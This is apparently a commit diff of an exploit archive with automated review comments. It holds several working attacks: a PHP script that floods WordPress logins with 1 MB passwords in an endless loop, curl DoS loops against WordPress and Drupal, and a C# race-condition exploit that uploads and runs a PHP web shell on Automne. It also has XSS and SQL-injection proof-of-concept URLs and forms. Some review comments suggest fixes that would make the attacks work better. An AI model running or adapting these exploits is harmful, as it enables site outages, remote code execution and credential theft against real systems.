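Review bot: this file is committed under `platforms/osx/remote/`, but its own header says `platform : Windows`, `Tested on : Windows XP SP3`, and the script only writes a local `Bo0M.m3u` that the victim must open, so it is a Windows file-format exploit, not an OS X remote one; move it accordingly. In the buffer construction, `$eip = pack('V',0x7C86467B)` is built but used only to size the NOP sled (`50 - length($eip)`) and is never written to the file, so the 'Jump ESP from kernel32.dll' comment describes bytes that are not in the payload; the address actually written is `$ret = 0x040904b0`, which reads like the `040904B0` language/codepage identifier from a Windows version resource rather than a verified `jmp esp` in QTOControl.dll and should be confirmed in a debugger, with the module base recorded. Also, `print "...created!\n" or die ...` attaches the error check to `print` rather than to `open (FILE ,"> Bo0M.m3u")`, so a failed open still reports success; use `open(...) or die $!`.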

platforms/php/webapps/35413.php Executable file
@ -0,0 +1,67 @@
<?php
echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";
echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];
do {
$multi = curl_multi_init();
$channels = array();
for ($x = 0; $x < $argv[3]; $x++) {
$ch = curl_init();
$postData = array(
'log' => $argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");
$cookieFiles = "cookie.txt";
curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));
curl_multi_add_handle($multi, $ch);
$channels[$x] = $ch;
}
$active = null;
do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
foreach ($channels as $channel) {
curl_multi_remove_handle($multi, $channel);
}
curl_multi_close($multi);
echo ".";
} while (1==1);
?>
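Review bot: `$argv[1]`, `$argv[2]` and `$argv[3]` are read without checking `$argc`, so running the script with no arguments prints undefined-offset notices and then loops forever POSTing an empty username to `/wp-login.php` on an empty host; add an argument-count guard that prints the usage text and exits. The usage line should also say that `username` must be an existing account, as the companion text advisory (35414) does with 'try with a valid user'; a 1 MB `pwd` against a non-existent user never reaches the password hashing that CVE-2014-9034 describes. One shared `cookie.txt` jar is written by every handle in the multi stack; harmless for a DoS, but worth a comment for anyone adapting the loop.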

platforms/php/webapps/35414.txt Executable file
@ -0,0 +1,51 @@
====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).
====================================================================
Time Line:
====================================================================
November 20, 2014 - A Wordpress security update and the security
advisory is published.
====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:
echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:
for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done
====================================================================
Authors:
====================================================================
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
====================================================================
References:
====================================================================
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
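Review bot: the proof of concept posts Drupal's login form, not WordPress's. `name=admin&pass=...&op=Log in&form_id=user_login` and the `?q=user` path are the Drupal fields used verbatim in the 35415 text, with only `/drupal/` changed to `/wordpress/`; WordPress's `wp-login.php` takes `log`, `pwd` and `wp-submit`, which the companion PHP PoC (35413) gets right. As written, the request is served by WordPress as an ordinary front-end page and never reaches the password check, so this text does not demonstrate the WordPress issue it describes. Also 'pyaload' for 'payload', 'Dos' for 'DoS', and both command lines are wrapped mid-string (`"&op=Log` / `in&form_id=user_login"`), which will not paste correctly; rejoin them.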

platforms/php/webapps/35415.txt Executable file
@ -0,0 +1,53 @@
====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Drupal < 7.34 allows an attacker to send
specially crafted requests resulting in CPU and memory exhaustion. This
may lead to the site becoming unavailable or unresponsive (denial of
service).
====================================================================
Time Line:
====================================================================
November 19, 2014 - A Drupal security update and the security advisory
is published.
====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:
echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:
for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
====================================================================
Authors:
====================================================================
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
====================================================================
References:
====================================================================
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
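Review bot: the payload generator depends on bash brace expansion (`printf "%s" {1..1000000}`); under `/bin/sh` on Debian-derived systems (dash) the braces are passed through literally and the 'password' is 12 characters long, so the DoS silently does nothing. State that bash is required, or generate the string portably (e.g. `head -c 6000000 /dev/zero | tr '\0' 'A'`). Both command lines are wrapped mid-string (`"&op=Log` / `in&form_id=user_login"` and the `curl --data @valid_user_payload` line), which breaks copy-paste; rejoin them in the committed file. 'pyaload' should be 'payload' and 'Dos' should be 'DoS'.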

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46771/info
Interleave is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Interleave 5.5.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>
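Review bot: the single URL injects `<script>alert(0)<%2fscript>` into seventeen query parameters at once (`AjaxHandler`, `e`, `eid`, `id`, `recordid`, ... `CT`), so the PoC does not show which of them `basicstats.php` actually reflects unescaped; a triage engineer needs either one request per parameter or a statement of which parameters were confirmed. The closing tag encodes only the slash (`<%2fscript>`) while `<` and `>` are sent raw, which looks like raw scanner output rather than a hand-verified payload; note how the reflection was confirmed.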

platforms/php/webapps/35417.php Executable file
@ -0,0 +1,145 @@
source: http://www.securityfocus.com/bid/46774/info
Automne is prone to an arbitrary-file-upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Automne 4.1.0 is vulnerable; other versions may also be affected.
Home Software Services Advisories Contact
Automne 4.1.0 Race Condition
// ------------------------------------------------------------------------
// Software................Automne 4.1.0
// Vulnerability...........Race Condition
// Threat Level............Very Critical (5/5)
// Download................http://en.automne-cms.org/
// Release Date............3/6/2011
// Tested On...............Windows Vista + XAMPP
// ------------------------------------------------------------------------
// Author..................AutoSec Tools
// Site....................http://www.autosectools.com/
// Email...................John Leitch <john@autosectools.com>
// ........................Bryce Darling <bryce@autosectools.com>
// ------------------------------------------------------------------------
//
//
// --Description--
//
// A race condition in Automne 4.1.0 can be exploited to bypass
// validation performed on uploaded files. The following proof of concept
// uploads a PHP script and then attempts to execute it before it is deleted.
//
//
// --PoC--
using System;
using System.Collections.Generic;
using System.Text;
using System.Threading;
using System.Diagnostics;
using System.Net.Sockets;
namespace RaceConditionExploit
{
class Program
{
static bool trying = true;
static void SendReq(string req)
{
try
{
var bytes = ASCIIEncoding.ASCII.GetBytes(req);
var client = new TcpClient();
client.Connect("localhost", 80);
using (var stream = client.GetStream())
stream.Write(bytes, 0, bytes.Length);
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
static void CheckForCalc()
{
if (Process.GetProcessesByName("calc").Length != 0)
trying = false;
}
static void Main()
{
var resets = new[]
{
new ManualResetEvent(false),
new ManualResetEvent(false),
new ManualResetEvent(false),
};
ThreadPool.QueueUserWorkItem(x =>
{
resets[0].WaitOne();
while (trying)
{
SendReq(@"POST /automne/automne/admin/upload-controler.php?atm-regen=shell.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 193
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name=""Filedata""; filename=""shell.php""
Content-Type: application/octet-stream
<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--
");
CheckForCalc();
}
resets[1].Set();
});
ThreadPool.QueueUserWorkItem(x =>
{
resets[0].WaitOne();
while (trying)
{
SendReq(@"GET http://localhost/automne/automne/upload/shell.php?CMD=calc.exe HTTP/1.1
Host: localhost
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.119 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=poiued4lsn8im03kb80t6131n3; osclass=9aae23cu0mqtopjv126loiu9n6; AutomneSession=mo70c3rth2qboupjpfbo010gv0
");
CheckForCalc();
}
resets[2].Set();
});
resets[0].Set();
resets[1].WaitOne();
resets[2].WaitOne();
}
}
}
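Review bot: the Cookie header of the second request (the PHPSESSID, osclass and AutomneSession values) carries what look like real session identifiers captured from the author's test environment; a published PoC should replace them with obvious placeholders, both so they are not mistaken for required values and so nothing from the test host leaks into the archive. Two documentation points for the same hunk: the file is stored as platforms/php/webapps/35417.php although its body is a C# console program (the only PHP is the one-line payload string), so the extension misleads readers and any tooling that classifies entries by suffix; and the advisory header records a threat level and the tested platform but not the vendor fix or a patched version, which is the first thing someone triaging an Automne deployment needs. The "Home Software Services Advisories Contact" line near the top is site navigation scraped along with the advisory and should be dropped from the archived file.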

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46781/info
The Inline Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Inline Gallery WordPress Plugin 0.3.9 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/inline-gallery/browser/browser.php?do=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46782/info
The PhotoSmash Galleries WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PhotoSmash Galleries WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/photosmash-galleries/index.php?action=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

15
platforms/php/webapps/35430.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/46783/info
1 Flash Gallery is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
1 Flash Gallery 0.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/1-flash-gallery/folder.php?type=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
<form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" >
<input type="hidden" name="album_id" value="1" />
<input type="hidden" name="images" value="1" />
<input type="hidden" name="gall_id" value="SQL_CODE_HERE" />
<input type="submit" value="submit" name="submit" />
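Review bot: the description announces both an SQL injection and a cross-site scripting issue, but the hunk never says which request demonstrates which; the reader has to infer that the type parameter of folder.php is the XSS and the gall_id field posted to massedit_album.php is the SQL injection. Add one sentence mapping each issue to its parameter. Two smaller points: the PoC form is never closed (no closing form tag after the submit input), and the two PoCs use different host placeholders (www.example.com in the URL, [host] in the form action); pick one.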

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46794/info
RuubikCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
RuubikCMS 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script>
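Review bot: the description says the cmspage parameter is used "in dynamically generated content" without saying where; the payload's leading closing title tag shows that head.php reflects the value inside the page's title element. Stating the output context in the description matters for remediation, because the fix is HTML-body-context encoding of the value before it is written into the title, not just attribute quoting.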

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46823/info
The Lazyest Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Lazyest Gallery WordPress Plugin 1.0.26 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/lazyest-gallery/lazyest-popup.php?image=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46825/info
Xinha is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Xinha 0.96.1 is vulnerable; prior versions may also be affected. Note that applications that use vulnerable versions of Xinha may also be affected.
http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E
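Review bot: the affected-version sentence says Xinha 0.96.1 is vulnerable, but the PoC path is under wikiwig5.01/_wk/Xinha/, i.e. the Xinha copy bundled with Wikiwig 5.01; the description should say that the tested target was that bundled copy, since the path is deployment-specific and will not exist on a standalone Xinha install. The description also speaks of "multiple HTML-injection vulnerabilities" while the hunk shows a single parameter (to_r_list of the SpellChecker plugin's spell-check-savedicts.php); either list the other affected parameters or narrow the wording.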